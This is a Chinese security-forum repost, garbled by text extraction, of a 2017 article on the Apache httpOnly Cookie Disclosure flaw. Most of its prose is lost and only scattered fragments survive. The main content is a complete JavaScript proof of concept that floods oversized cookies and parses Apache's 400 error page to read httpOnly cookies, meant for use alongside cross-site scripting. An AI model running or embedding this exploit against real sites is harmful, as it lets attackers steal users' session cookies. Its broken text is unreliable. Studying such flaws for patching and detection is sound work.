搜索

[20787] 2017-06-16_ApachehttpOnlyCookieDisclosure原理及利用代码

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2017-06-16_ApachehttpOnlyCookieDisclosure原理及利用代码 A p a c h e   h t t p O n l y   C o o k i e   D i s c l o s u r e L e m o n S e c   2 0 1 7 - 0 6 - 1 6 X S S c m s x s s c o o k i e c o o k i e h t t p o n l y j s c o o k i e x s s A p a c h e   H T T P   S e r v e r H T T P 4 0 0 c o o k i e h t t p o n l y C o o k i e                 a p a c h e 4 k c o o k i e 4 0 0 c o o k i e c o o k i e 便 x s s c o o k i e c o o k i e 使 c o o k i e 4 k j s a p a c h e 4 0 0 c o o k i e j s c o o k i e j s c o o k i e 便 c o o k i e h t t p o n l y                 N e s s u s A p a c h e   h t t p O n l y   C o o k i e   D i s c l o s u r e 便 A p a c h e   h t t p O n l y   C o o k i e   D i s c l o s u r e f i r e b u g f i r e f o x f i r e b u g f i r e f o x 访 A p a c h e   h t t p O n l y   C o o k i e   D i s c l o s u r e f i r e b u g F 1 2 f i r e b u g f i r e b u g 1 .   / /   S o u r c e :   h t t p s : / / g i s t . g i t h u b . c o m / 1 9 5 5 a 1 c 2 8 3 2 4 d 4 7 2 4 b 7 b / 7 f e 5 1 f 2 a 6 6 c 1 d 4 a 4 0 a 7 3 6 5 4 0 b 3 a d 3 f d e 0 2 b 7 f b 0 8     2 .   / /   M o s t   b r o w s e r s   l i m i t   c o o k i e s   t o   4 k   c h a r a c t e r s ,   s o   w e   n e e d   m u l t i p l e     3 .   f u n c t i o n   s e t C o o k i e s   ( g o o d )   {     4 .           / /   C o n s t r u c t   s t r i n g   f o r   c o o k i e   v a l u e     5 .           v a r   s t r   =   " " ;     6 .           f o r   ( v a r   i = 0 ;   i <   8 1 9 ;   i + + )   {     7 .                   s t r   + =   " x " ;     8 .           }     9 .           / /   S e t   c o o k i e s     1 0 .           f o r   ( i   =   0 ;   i   <   1 0 ;   i + + )   {     1 1 .                   / /   E x p i r e   e v i l   c o o k i e     1 2 .                   i f   ( g o o d )   {     1 3 .                           v a r   c o o k i e   =   " x s s " + i + " = ; e x p i r e s = " + n e w   D a t e ( + n e w   D a t e ( ) - 1 ) . t o U T C S t r i n g ( ) + " ;   p a t h = / ; " ;     1 4 .                   }     1 5 .                   / /   S e t   e v i l   c o o k i e     1 6 .                   e l s e   {     1 7 .                           v a r   c o o k i e   =   " x s s " + i + " = " + s t r + " ; p a t h = / " ;     1 8 .                   }     1 9 .                   d o c u m e n t . c o o k i e   =   c o o k i e ;     2 0 .           }     2 1 .   }     2 2 .   f u n c t i o n   m a k e R e q u e s t ( )   {     2 3 .           s e t C o o k i e s ( ) ;     2 4 .           f u n c t i o n   p a r s e C o o k i e s   ( )   {     2 5 .                   v a r   c o o k i e _ d i c t   =   { } ;     2 6 .                   / /   O n l y   r e a c t   o n   4 0 0   s t a t u s     2 7 .                   i f   ( x h r . r e a d y S t a t e   = = =   4   & &   x h r . s t a t u s   = = =   4 0 0 )   {    
2 8 .                           / /   R e p l a c e   n e w l i n e s   a n d   m a t c h   < p r e >   c o n t e n t     2 9 .                           v a r   c o n t e n t   =   x h r . r e s p o n s e T e x t . r e p l a c e ( / r | n / g , ' ' ) . m a t c h ( / < p r e > ( . + ) < / p r e > / ) ;     3 0 .                           i f   ( c o n t e n t . l e n g t h )   {     3 1 .                                   / /   R e m o v e   C o o k i e :   p r e f i x     3 2 .                                   c o n t e n t   =   c o n t e n t [ 1 ] . r e p l a c e ( " C o o k i e :   " ,   " " ) ;     3 3 .                                   v a r   c o o k i e s   =   c o n t e n t . r e p l a c e ( / x s s d = x + ; ? / g ,   ' ' ) . s p l i t ( / ; / g ) ;     3 4 .                                   / /   A d d   c o o k i e s   t o   o b j e c t     3 5 .                                   f o r   ( v a r   i = 0 ;   i < c o o k i e s . l e n g t h ;   i + + )   {     3 6 .                                           v a r   s _ c   =   c o o k i e s [ i ] . s p l i t ( ' = ' , 2 ) ;     3 7 .                                           c o o k i e _ d i c t [ s _ c [ 0 ] ]   =   s _ c [ 1 ] ;     3 8 .                                   }     3 9 .                           }     4 0 .                           / /   U n s e t   m a l i c i o u s   c o o k i e s     4 1 .                           s e t C o o k i e s ( t r u e ) ;     4 2 .                           a l e r t ( J S O N . s t r i n g i f y ( c o o k i e _ d i c t ) ) ;     4 3 .                   }     4 4 .           }     4 5 .           / /   M a k e   X H R   r e q u e s t     4 6 .           v a r   x h r   =   n e w   X M L H t t p R e q u e s t ( ) ;     4 7 .           x h r . o n r e a d y s t a t e c h a n g e   =   p a r s e C o o k i e s ;     4 8 .           x h r . o p e n ( " G E T " ,   " / " ,   t r u e ) ;     4 9 .           x h r . s e n d ( n u l l ) ;     5 0 .   }     5 1 .   m a k e R e q u e s t ( ) ; A p a c h e   h t t p O n l y   C o o k i e   D i s c l o s u r e c o o k i e
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理